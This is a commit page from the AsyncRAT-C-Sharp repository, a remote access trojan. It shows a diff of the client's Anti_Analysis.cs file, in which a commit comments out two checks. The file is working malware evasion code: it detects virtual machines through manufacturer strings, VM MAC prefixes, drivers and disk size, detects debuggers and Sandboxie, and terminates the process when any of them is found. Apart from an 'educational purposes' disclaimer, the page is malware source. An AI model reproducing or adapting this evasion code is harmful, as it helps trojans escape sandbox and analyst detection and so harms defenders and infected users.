Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Commented out Unimplemented methods

Browse Source 
Will probably add these methods at a later date once they have been updated to work with this version
This commit is contained in:
MrDevBot 2019-05-21 19:35:37 +10:00 committed by GitHub
parent 0e5870a795
commit 34c8a05752
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 118 additions and 118 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

236
AsyncRAT-C#/Client/Helper/Anti_Analysis.cs
View File

@ -1,7 +1,7 @@
using System; using System;
using System.Diagnostics; using System.Diagnostics;
using System.Linq; using System.Linq;
using System.Management; using System.Management;
using System.Net.NetworkInformation; using System.Net.NetworkInformation;
using System.Runtime.InteropServices; using System.Runtime.InteropServices;
@ -12,125 +12,125 @@ using System.Runtime.InteropServices;
// This program is distributed for educational purposes only. // This program is distributed for educational purposes only.
namespace Client.Helper namespace Client.Helper
{ {
class Anti_Analysis class Anti_Analysis
{ {
private static long GB_50 = 50000000000; private static long GB_50 = 50000000000;
public static void RunAntiAnalysis() public static void RunAntiAnalysis()
{ {
if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie()) if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie())
Environment.FailFast(null); Environment.FailFast(null);
} }
internal static bool SmallHDD() internal static bool SmallHDD()
{ {
// Method One - main drive smaller than 50gb, likely a VM // Method One - main drive smaller than 50gb, likely a VM
long driveSize = Methods.GetMainDriveSize(); long driveSize = Methods.GetMainDriveSize();
if (driveSize <= GB_50 * 2) if (driveSize <= GB_50 * 2)
return true;
// Method Two - has common card of virtual machine
if (HasVMCard())
return true;
// Method Three - checks for vm drivers
if (HasVBOXDriver())
return true;
// Method Four - if machine has been on for less than 5 mins
if (GetUptime() < TimeSpan.FromMinutes(5))
return true; return true;
// Method Two - has common card of virtual machine
//if (HasVMCard())
//return true;
// Method Three - checks for vm drivers
if (HasVBOXDriver())
return true;
// Method Four - if machine has been on for less than 5 mins
//if (GetUptime() < TimeSpan.FromMinutes(5))
//return true;
// Method Five - has VM mac address // Method Five - has VM mac address
if (HasVMMac()) if (HasVMMac())
return true; return true;
return false; return false;
} }
private static bool HasVMMac() private static bool HasVMMac()
{ {
var macAddr = var macAddr =
( (
from nic in NetworkInterface.GetAllNetworkInterfaces() from nic in NetworkInterface.GetAllNetworkInterfaces()
where nic.OperationalStatus == OperationalStatus.Up where nic.OperationalStatus == OperationalStatus.Up
select nic.GetPhysicalAddress().ToString() select nic.GetPhysicalAddress().ToString()
).FirstOrDefault(); ).FirstOrDefault();
var macs = new[] var macs = new[]
{ {
"00-05-69", "00-05-69",
"00:05:69", "00:05:69",
"000569", "000569",
"00-50-56", "00-50-56",
"00:50:56", "00:50:56",
"005056", "005056",
"00-0C-29", "00-0C-29",
"00:0C:29", "00:0C:29",
"000C29", "000C29",
"00-1C-14", "00-1C-14",
"00:1C:14", "00:1C:14",
"001C14", "001C14",
"08-00-27", "08-00-27",
"08:00:27", "08:00:27",
"080027", "080027",
}; };
foreach (string mac in macs) foreach (string mac in macs)
{ {
if (mac == macAddr) if (mac == macAddr)
return true; return true;
} }
return false; return false;
} }
private static bool DetectVirtualMachine() private static bool DetectVirtualMachine()
{ {
using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem")) using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
{ {
using (var items = searcher.Get()) using (var items = searcher.Get())
{ {
foreach (var item in items) foreach (var item in items)
{ {
string manufacturer = item["Manufacturer"].ToString().ToLower(); string manufacturer = item["Manufacturer"].ToString().ToLower();
if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL"))
|| manufacturer.Contains("vmware") || manufacturer.Contains("vmware")
|| item["Model"].ToString() == "VirtualBox") || item["Model"].ToString() == "VirtualBox")
{ {
return true; return true;
} }
} }
} }
} }
return false; return false;
} }
private static bool DetectDebugger() private static bool DetectDebugger()
{ {
bool isDebuggerPresent = false; bool isDebuggerPresent = false;
CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent); CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent);
return isDebuggerPresent; return isDebuggerPresent;
} }
private static bool DetectSandboxie() private static bool DetectSandboxie()
{ {
if (GetModuleHandle("SbieDll.dll").ToInt32() != 0) if (GetModuleHandle("SbieDll.dll").ToInt32() != 0)
return true; return true;
else else
return false; return false;
} }
[DllImport("kernel32.dll")] [DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName); public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent); static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);
} }
} }